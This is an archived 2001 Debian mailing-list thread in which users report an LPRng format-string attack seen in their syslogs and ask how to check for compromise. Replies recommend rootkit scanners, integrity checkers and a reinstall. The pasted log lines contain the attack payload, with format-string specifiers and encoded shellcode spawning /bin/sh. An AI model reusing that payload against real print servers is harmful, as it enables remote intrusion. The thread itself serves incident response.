Re: Got hacked by Ramen-style attack

2001-11-22 Thread Jim McCloskey

Thomas Amm <[EMAIL PROTECTED]> wrote:

|> that's what I found in my logs after I had to reboot my 
|> Router, which also worked as print server (Now I know better)
|> because of a DoS.

Exactly the same messages here (in /var/log/sys.log and
/var/log/messages). See my earlier posting:

 To: debian-user@lists.debian.org 
 Subject: LPRNG vulnerability [was Re: weird messages in syslog] 
 From: Jim McCloskey <[EMAIL PROTECTED]> 
 Date: Wed, 21 Nov 2001 10:29:16 -0800 
 CC: debian-security@lists.debian.org 
 References: <[EMAIL PROTECTED]> 

I am using lprng 3.8.0 from Debian testing. I am not running nmbd.
There are no messages in the logs about accepted or refused
connections that seem to be related to the incident.

|> So there are some questions, I would like to pose :
|> Is Woody's lprng still vulnerable ? I've got the latest version.

I think it must be.

|> Is the shown exploit a sign that someone already was in there, or just for
|> an 
|> attempt 
|> ?
|> Can I find possible backdoors, or will I have to re-install ?

I also would love answers to these questions. I've not managed to find
any signs of damage so far, and the incident didn't bring the system
down, but I'm very nervous ...

Jim

PS here are the relevant messages:

--
Nov 20 01:18:12 localhost SERVER[21311]: Dispatch_input: bad request line 
'BB??\
??XX%.156u%300$n%.21u%301$nsecurity%302$n%.192u%303$n\220\220\220\2\
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\
.

2201?1?1??F?\200\211?1??f\211?1?\211?C\211]?C\211]?K\211M?\215M??\2001?\211
Nov 20 01:18:13 localhost SERVER[21312]: Dispatch_input: bad request line 
'BB(???)???*?\
??+???XX%.232u%300$n%.199u%301$nsecurity.i%302$n%.192u%303$n\220\220\22\
0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2\
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\

repeated then at one second intervals between 01:18:12 and
01:18:47---the same message followed by the same long sequence of
garbage-characters, with a new PID each time.
--



Re: Got hacked by Ramen-style attack

2001-11-22 Thread Jim McCloskey


Thomas Amm <[EMAIL PROTECTED]> wrote:

|> that's what I found in my logs after I had to reboot my 
|> Router, which also worked as print server (Now I know better)
|> because of a DoS.

Exactly the same messages here (in /var/log/sys.log and
/var/log/messages). See my earlier posting:

 To: [EMAIL PROTECTED] 
 Subject: LPRNG vulnerability [was Re: weird messages in syslog] 
 From: Jim McCloskey <[EMAIL PROTECTED]> 
 Date: Wed, 21 Nov 2001 10:29:16 -0800 
 CC: [EMAIL PROTECTED] 
 References:  

I am using lprng 3.8.0 from Debian testing. I am not running nmbd.
There are no messages in the logs about accepted or refused
connections that seem to be related to the incident.

|> So there are some questions, I would like to pose :
|> Is Woody's lprng still vulnerable ? I've got the latest version.

I think it must be.

|> Is the shown exploit a sign that someone already was in there, or just for
|> an 
|> attempt 
|> ?
|> Can I find possible backdoors, or will I have to re-install ?

I also would love answers to these questions. I've not managed to find
any signs of damage so far, and the incident didn't bring the system
down, but I'm very nervous ...

Jim

PS here are the relevant messages:

--
Nov 20 01:18:12 localhost SERVER[21311]: Dispatch_input: bad request line 
'BB??\
??XX%.156u%300$n%.21u%301$nsecurity%302$n%.192u%303$n\220\220\220\2\
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\
.

2201?1?1??F?\200\211?1??f\211?1?\211?C\211]?C\211]?K\211M?\215M??\2001?\211
Nov 20 01:18:13 localhost SERVER[21312]: Dispatch_input: bad request line 
'BB(???)???*?\
??+???XX%.232u%300$n%.199u%301$nsecurity.i%302$n%.192u%303$n\220\220\22\
0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2\
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\

repeated then at one second intervals between 01:18:12 and
01:18:47---the same message followed by the same long sequence of
garbage-characters, with a new PID each time.
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]




Re: Got hacked by Ramen-style attack

2001-11-22 Thread Alvin Oga

hi ya giacomo..

On Thu, 22 Nov 2001, Giacomo Mulas wrote:
> On Thu, 22 Nov 2001, Alvin Oga wrote:
> 
> > they tried doesn't mean they got in
> 
> you are correct so far, but if you read later on, the original poster
> adds:
> 
> > I had a number of rejected packets to port 137 immediately before, nmbd
> > crashed and the lprng exploit started.
> 
> If at least one daemon was crashed, the attack may have been successful,
> so he has every reason to be cautious.

yup  but, i'd move the samba server to be internal.. and not
externally visible
- no reason for samba servers to be externally visible

samba ( nmbd/smbd could die for many different reasons )

without knowing the state of the fs before the attack... its a little
harder to find what's different...
- ie.. run tripwire, checksums, aide, etc

- when checking a possibly infected host, am assuming one uses the binary
  off of a cdrom instead of the (trojaned) machine itself to check its
  binary... which usually returns all okay..even if its not


fun stuff... to go checking ...
not fun to have to rebuild a new box and very carefully restore data

have fun linux
alvin



Re: Got hacked by Ramen-style attack

2001-11-22 Thread Giacomo Mulas
On Thu, 22 Nov 2001, Alvin Oga wrote:

> they tried doesn't mean they got in

you are correct so far, but if you read later on, the original poster
adds:

> I had a number of rejected packets to port 137 immediately before, nmbd
> crashed and the lprng exploit started.

If at least one daemon was crashed, the attack may have been successful,
so he has every reason to be cautious.

Bye
Giacomo

-- 
_

Giacomo Mulas <[EMAIL PROTECTED], [EMAIL PROTECTED]>
_

OSSERVATORIO ASTRONOMICO DI CAGLIARI
Str. 54, Loc. Poggio dei Pini * 09012 Capoterra (CA)

Tel.: +39 070 71180 216 Fax : +39 070 71180 222
_

"When the storms are raging around you, stay right where you are"
 (Freddy Mercury)
_



Re: Got hacked by Ramen-style attack

2001-11-22 Thread Alvin Oga

hi ya

> > Nov 21 03:29:36 lan1 -- MARK --
> > Nov 21 03:32:08 lan1 SERVER[2757]: Dispatch_input: bad request line
> >
> 'BBÜóÿ¿Ýóÿ¿Þóÿ¿ßóÿ¿XX%.156u%300$n%.21u%301$nsecurity%302$n%.
> 192u

they tried doesn't mean they got in

> > I searched the system for fragments of the Ramen worm after reboot but I
> > found nothing suspicious.

how did you check ???

http://www.ists.dartmouth.edu/IRIA/knowledge_base/tools/ramenfind.htm
- lots of tools to check for stuff

to check for other root kits they may have used/hidden/left behind...
http://www.chkrootkit.org
- many other tools ( search for rootkit, trojans, etc.. )

if you re-install without digging deeper...you wont learn anything new ??
if you do dig deeper..maybe you'd find lots of suspicious files???
re-install assumes oyu patch it up to current levels,
and that your backup data does NOT have any trojans

Debian Security howto
http://www.debian.org/doc/manuals/securing-debian-howto/

c ya
alvin
http://www.Linux-Sec.net .. rest of the hardening howto ..


> > The attack seemed to come over nmbd, although all ports, exept inetd are
> > blocked to the
> > outside
> > vi ipchains. I had a number of rejected packets to port 137 immediately
> > before,
> > nmbd crashed
> > and
> > the lprng exploit started.
> > So there are some questions, I would like to pose :
> > Is Woody's lprng still vulnerable ? I've got the latest version.
> > Is the shown exploit a sign that someone already was in there, or just for
> > an
> > attempt
> > ?
> > Can I find possible backdoors, or will I have to re-install ?
> >



Re: Got hacked by Ramen-style attack

2001-11-22 Thread SaDIKuZboy
try to :
nmap -I -O -P0 127.0.0.1
ps ax
and see if you see something strange
for more help from me just paste tables in an email

note: once i had socklist ... a program that could tell u which programs
keeps sockets up
note2: look, no sock opens doesnt mean u re without any backdoor ... a sock
can open on an event such as time-trigger or icmp trigger ... so u should
monitor more that machine

SaDIKuZboy
- Original Message -
From: "Thomas Amm" <[EMAIL PROTECTED]>
To: 
Sent: Thursday, November 22, 2001 1:50 PM
Subject: Got hacked by Ramen-style attack


>
> On Thu, 22 Nov 2001 12:06:21 Thomas Amm wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
>
> Hi all,
>
> that's what I found in my logs after I had to reboot my
> Router, which also worked as print server (Now I know better)
> because of a DoS.
>
>
> Nov 21 03:29:36 lan1 -- MARK --
> Nov 21 03:32:08 lan1 SERVER[2757]: Dispatch_input: bad request line
>
'BBÜóÿ¿Ýóÿ¿Þóÿ¿ßóÿ¿XX%.156u%300$n%.21u%301$nsecurity%302$n%.
192u
>
%303$n1Û1É1À°FÍå1Ò²fÐ1ÉËC]øC]ôKMüMôÍ1ÉEôCf]ìfÇEî^O'MðEìEøÆEü^PÐMôÍÐCCÍÐCÍÃ1É
²?ÐÍ
> ÐAÍë^X^u^H1ÀF^GE^L°^KóM^HU^LÍèãÿÿÿ/bin/sh'
> Nov 21 03:32:10 lan1 SERVER[2758]: Dispatch_input: bad request line
>
'BB(ñÿ¿)ñÿ¿*ñÿ¿+ñÿ¿XX%.232u%300$n%.199u%301$nsecurity.i%302$
n%.1
>
92u%303$n1Û1É1À°FÍå1Ò²fÐ1ÉËC]øC]ôKMüMôÍ1ÉEôCf]ìfÇEî^O'MðEìEøÆEü^PÐMôÍÐCCÍÐCÍ
Ã1ɲ
> ?ÐÍÐAÍë^X^u^H1ÀF^GE^L°^KóM^HU^LÍèãÿÿÿ/bin/sh'
> Nov 21 03:32:11 lan1 SERVER[2759]: Dispatch_input: bad request line 'BBH
> (and so on) - the lpr.log shows the same entries.
>
> I searched the system for fragments of the Ramen worm after reboot but I
> found
> nothing
> suspicious.
> The attack seemed to come over nmbd, although all ports, exept inetd are
> blocked to the
> outside
> vi ipchains. I had a number of rejected packets to port 137 immediately
> before,
> nmbd crashed
> and
> the lprng exploit started.
> So there are some questions, I would like to pose :
> Is Woody's lprng still vulnerable ? I've got the latest version.
> Is the shown exploit a sign that someone already was in there, or just for
> an
> attempt
> ?
> Can I find possible backdoors, or will I have to re-install ?
>
> Thanks,
> -BEGIN PGP SIGNATURE-
> Version: GnuPG v1.0.6 (GNU/Linux)
> Comment: For info see http://www.gnupg.org
>
> iEYEARECAAYFAjv829UACgkQRMvUAcFGSvDcwACgw39Hh2j83YJ1v42pgwJvL1je
> ryoAoP8tSMHNsBuH3jRtU6WG07MnQ48t
> =8csx
> -END PGP SIGNATURE-
>
> --
> Things are more like they are today than they ever were before.
> -- Dwight Eisenhower
>
>
> --
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact
[EMAIL PROTECTED]
>



Got hacked by Ramen-style attack

2001-11-22 Thread Thomas Amm

On Thu, 22 Nov 2001 12:06:21 Thomas Amm wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


Hi all,

that's what I found in my logs after I had to reboot my 
Router, which also worked as print server (Now I know better)
because of a DoS.


Nov 21 03:29:36 lan1 -- MARK --
Nov 21 03:32:08 lan1 SERVER[2757]: Dispatch_input: bad request line 
'BBÜóÿ¿Ýóÿ¿Þóÿ¿ßóÿ¿XX%.156u%300$n%.21u%301$nsecurity%302$n%.192u
%303$n1Û1É1À°FÍå1Ò²fÐ1ÉËC]øC]ôKMüMôÍ1ÉEôCf]ìfÇEî^O'MðEìEøÆEü^PÐMôÍÐCCÍÐCÍÃ1ɲ?ÐÍ
ÐAÍë^X^u^H1ÀF^GE^L°^KóM^HU^LÍèãÿÿÿ/bin/sh'
Nov 21 03:32:10 lan1 SERVER[2758]: Dispatch_input: bad request line 
'BB(ñÿ¿)ñÿ¿*ñÿ¿+ñÿ¿XX%.232u%300$n%.199u%301$nsecurity.i%302$n%.1
92u%303$n1Û1É1À°FÍå1Ò²fÐ1ÉËC]øC]ôKMüMôÍ1ÉEôCf]ìfÇEî^O'MðEìEøÆEü^PÐMôÍÐCCÍÐCÍÃ1ɲ
?ÐÍÐAÍë^X^u^H1ÀF^GE^L°^KóM^HU^LÍèãÿÿÿ/bin/sh'
Nov 21 03:32:11 lan1 SERVER[2759]: Dispatch_input: bad request line 'BBH 
(and so on) - the lpr.log shows the same entries.

I searched the system for fragments of the Ramen worm after reboot but I
found 
nothing 
suspicious.
The attack seemed to come over nmbd, although all ports, exept inetd are 
blocked to the 
outside
vi ipchains. I had a number of rejected packets to port 137 immediately
before, 
nmbd crashed 
and
the lprng exploit started.
So there are some questions, I would like to pose :
Is Woody's lprng still vulnerable ? I've got the latest version.
Is the shown exploit a sign that someone already was in there, or just for
an 
attempt 
?
Can I find possible backdoors, or will I have to re-install ?

Thanks,
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iEYEARECAAYFAjv829UACgkQRMvUAcFGSvDcwACgw39Hh2j83YJ1v42pgwJvL1je
ryoAoP8tSMHNsBuH3jRtU6WG07MnQ48t
=8csx
-END PGP SIGNATURE-

-- 
Things are more like they are today than they ever were before.
-- Dwight Eisenhower



Re: Got hacked by Ramen-style attack

2001-11-22 Thread Alvin Oga


hi ya giacomo..

On Thu, 22 Nov 2001, Giacomo Mulas wrote:
> On Thu, 22 Nov 2001, Alvin Oga wrote:
> 
> > they tried doesn't mean they got in
> 
> you are correct so far, but if you read later on, the original poster
> adds:
> 
> > I had a number of rejected packets to port 137 immediately before, nmbd
> > crashed and the lprng exploit started.
> 
> If at least one daemon was crashed, the attack may have been successful,
> so he has every reason to be cautious.

yup  but, i'd move the samba server to be internal.. and not
externally visible
- no reason for samba servers to be externally visible

samba ( nmbd/smbd could die for many different reasons )

without knowing the state of the fs before the attack... its a little
harder to find what's different...
- ie.. run tripwire, checksums, aide, etc

- when checking a possibly infected host, am assuming one uses the binary
  off of a cdrom instead of the (trojaned) machine itself to check its
  binary... which usually returns all okay..even if its not


fun stuff... to go checking ...
not fun to have to rebuild a new box and very carefully restore data

have fun linux
alvin


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]




Re: Got hacked by Ramen-style attack

2001-11-22 Thread Giacomo Mulas

On Thu, 22 Nov 2001, Alvin Oga wrote:

> they tried doesn't mean they got in

you are correct so far, but if you read later on, the original poster
adds:

> I had a number of rejected packets to port 137 immediately before, nmbd
> crashed and the lprng exploit started.

If at least one daemon was crashed, the attack may have been successful,
so he has every reason to be cautious.

Bye
Giacomo

-- 
_

Giacomo Mulas <[EMAIL PROTECTED], [EMAIL PROTECTED]>
_

OSSERVATORIO ASTRONOMICO DI CAGLIARI
Str. 54, Loc. Poggio dei Pini * 09012 Capoterra (CA)

Tel.: +39 070 71180 216 Fax : +39 070 71180 222
_

"When the storms are raging around you, stay right where you are"
 (Freddy Mercury)
_


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]




Re: Got hacked by Ramen-style attack

2001-11-22 Thread Alvin Oga


hi ya

> > Nov 21 03:29:36 lan1 -- MARK --
> > Nov 21 03:32:08 lan1 SERVER[2757]: Dispatch_input: bad request line
> >
> 'BBÜóÿ¿Ýóÿ¿Þóÿ¿ßóÿ¿XX%.156u%300$n%.21u%301$nsecurity%302$n%.
> 192u

they tried doesn't mean they got in

> > I searched the system for fragments of the Ramen worm after reboot but I
> > found nothing suspicious.

how did you check ???

http://www.ists.dartmouth.edu/IRIA/knowledge_base/tools/ramenfind.htm
- lots of tools to check for stuff

to check for other root kits they may have used/hidden/left behind...
http://www.chkrootkit.org
- many other tools ( search for rootkit, trojans, etc.. )

if you re-install without digging deeper...you wont learn anything new ??
if you do dig deeper..maybe you'd find lots of suspicious files???
re-install assumes oyu patch it up to current levels,
and that your backup data does NOT have any trojans

Debian Security howto
http://www.debian.org/doc/manuals/securing-debian-howto/

c ya
alvin
http://www.Linux-Sec.net .. rest of the hardening howto ..


> > The attack seemed to come over nmbd, although all ports, exept inetd are
> > blocked to the
> > outside
> > vi ipchains. I had a number of rejected packets to port 137 immediately
> > before,
> > nmbd crashed
> > and
> > the lprng exploit started.
> > So there are some questions, I would like to pose :
> > Is Woody's lprng still vulnerable ? I've got the latest version.
> > Is the shown exploit a sign that someone already was in there, or just for
> > an
> > attempt
> > ?
> > Can I find possible backdoors, or will I have to re-install ?
> >


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]




Re: Got hacked by Ramen-style attack

2001-11-22 Thread SaDIKuZboy

try to :
nmap -I -O -P0 127.0.0.1
ps ax
and see if you see something strange
for more help from me just paste tables in an email

note: once i had socklist ... a program that could tell u which programs
keeps sockets up
note2: look, no sock opens doesnt mean u re without any backdoor ... a sock
can open on an event such as time-trigger or icmp trigger ... so u should
monitor more that machine

SaDIKuZboy
- Original Message -
From: "Thomas Amm" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Thursday, November 22, 2001 1:50 PM
Subject: Got hacked by Ramen-style attack


>
> On Thu, 22 Nov 2001 12:06:21 Thomas Amm wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
>
> Hi all,
>
> that's what I found in my logs after I had to reboot my
> Router, which also worked as print server (Now I know better)
> because of a DoS.
>
>
> Nov 21 03:29:36 lan1 -- MARK --
> Nov 21 03:32:08 lan1 SERVER[2757]: Dispatch_input: bad request line
>
'BBÜóÿ¿Ýóÿ¿Þóÿ¿ßóÿ¿XX%.156u%300$n%.21u%301$nsecurity%302$n%.
192u
>
%303$n1Û1É1À°FÍå1Ò²fÐ1ÉËC]øC]ôKMüMôÍ1ÉEôCf]ìfÇEî^O'MðEìEøÆEü^PÐMôÍÐCCÍÐCÍÃ1É
²?ÐÍ
> ÐAÍë^X^u^H1ÀF^GE^L°^KóM^HU^LÍèãÿÿÿ/bin/sh'
> Nov 21 03:32:10 lan1 SERVER[2758]: Dispatch_input: bad request line
>
'BB(ñÿ¿)ñÿ¿*ñÿ¿+ñÿ¿XX%.232u%300$n%.199u%301$nsecurity.i%302$
n%.1
>
92u%303$n1Û1É1À°FÍå1Ò²fÐ1ÉËC]øC]ôKMüMôÍ1ÉEôCf]ìfÇEî^O'MðEìEøÆEü^PÐMôÍÐCCÍÐCÍ
Ã1ɲ
> ?ÐÍÐAÍë^X^u^H1ÀF^GE^L°^KóM^HU^LÍèãÿÿÿ/bin/sh'
> Nov 21 03:32:11 lan1 SERVER[2759]: Dispatch_input: bad request line 'BBH
> (and so on) - the lpr.log shows the same entries.
>
> I searched the system for fragments of the Ramen worm after reboot but I
> found
> nothing
> suspicious.
> The attack seemed to come over nmbd, although all ports, exept inetd are
> blocked to the
> outside
> vi ipchains. I had a number of rejected packets to port 137 immediately
> before,
> nmbd crashed
> and
> the lprng exploit started.
> So there are some questions, I would like to pose :
> Is Woody's lprng still vulnerable ? I've got the latest version.
> Is the shown exploit a sign that someone already was in there, or just for
> an
> attempt
> ?
> Can I find possible backdoors, or will I have to re-install ?
>
> Thanks,
> -BEGIN PGP SIGNATURE-
> Version: GnuPG v1.0.6 (GNU/Linux)
> Comment: For info see http://www.gnupg.org
>
> iEYEARECAAYFAjv829UACgkQRMvUAcFGSvDcwACgw39Hh2j83YJ1v42pgwJvL1je
> ryoAoP8tSMHNsBuH3jRtU6WG07MnQ48t
> =8csx
> -END PGP SIGNATURE-
>
> --
> Things are more like they are today than they ever were before.
> -- Dwight Eisenhower
>
>
> --
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact
[EMAIL PROTECTED]
>


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]




Got hacked by Ramen-style attack

2001-11-22 Thread Thomas Amm


On Thu, 22 Nov 2001 12:06:21 Thomas Amm wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


Hi all,

that's what I found in my logs after I had to reboot my 
Router, which also worked as print server (Now I know better)
because of a DoS.


Nov 21 03:29:36 lan1 -- MARK --
Nov 21 03:32:08 lan1 SERVER[2757]: Dispatch_input: bad request line 
'BBÜóÿ¿Ýóÿ¿Þóÿ¿ßóÿ¿XX%.156u%300$n%.21u%301$nsecurity%302$n%.192u
%303$n1Û1É1À°FÍå1Ò²fÐ1ÉËC]øC]ôKMüMôÍ1ÉEôCf]ìfÇEî^O'MðEìEøÆEü^PÐMôÍÐCCÍÐCÍÃ1ɲ?ÐÍ
ÐAÍë^X^u^H1ÀF^GE^L°^KóM^HU^LÍèãÿÿÿ/bin/sh'
Nov 21 03:32:10 lan1 SERVER[2758]: Dispatch_input: bad request line 
'BB(ñÿ¿)ñÿ¿*ñÿ¿+ñÿ¿XX%.232u%300$n%.199u%301$nsecurity.i%302$n%.1
92u%303$n1Û1É1À°FÍå1Ò²fÐ1ÉËC]øC]ôKMüMôÍ1ÉEôCf]ìfÇEî^O'MðEìEøÆEü^PÐMôÍÐCCÍÐCÍÃ1ɲ
?ÐÍÐAÍë^X^u^H1ÀF^GE^L°^KóM^HU^LÍèãÿÿÿ/bin/sh'
Nov 21 03:32:11 lan1 SERVER[2759]: Dispatch_input: bad request line 'BBH 
(and so on) - the lpr.log shows the same entries.

I searched the system for fragments of the Ramen worm after reboot but I
found 
nothing 
suspicious.
The attack seemed to come over nmbd, although all ports, exept inetd are 
blocked to the 
outside
vi ipchains. I had a number of rejected packets to port 137 immediately
before, 
nmbd crashed 
and
the lprng exploit started.
So there are some questions, I would like to pose :
Is Woody's lprng still vulnerable ? I've got the latest version.
Is the shown exploit a sign that someone already was in there, or just for
an 
attempt 
?
Can I find possible backdoors, or will I have to re-install ?

Thanks,
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iEYEARECAAYFAjv829UACgkQRMvUAcFGSvDcwACgw39Hh2j83YJ1v42pgwJvL1je
ryoAoP8tSMHNsBuH3jRtU6WG07MnQ48t
=8csx
-END PGP SIGNATURE-

-- 
Things are more like they are today than they ever were before.
-- Dwight Eisenhower


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]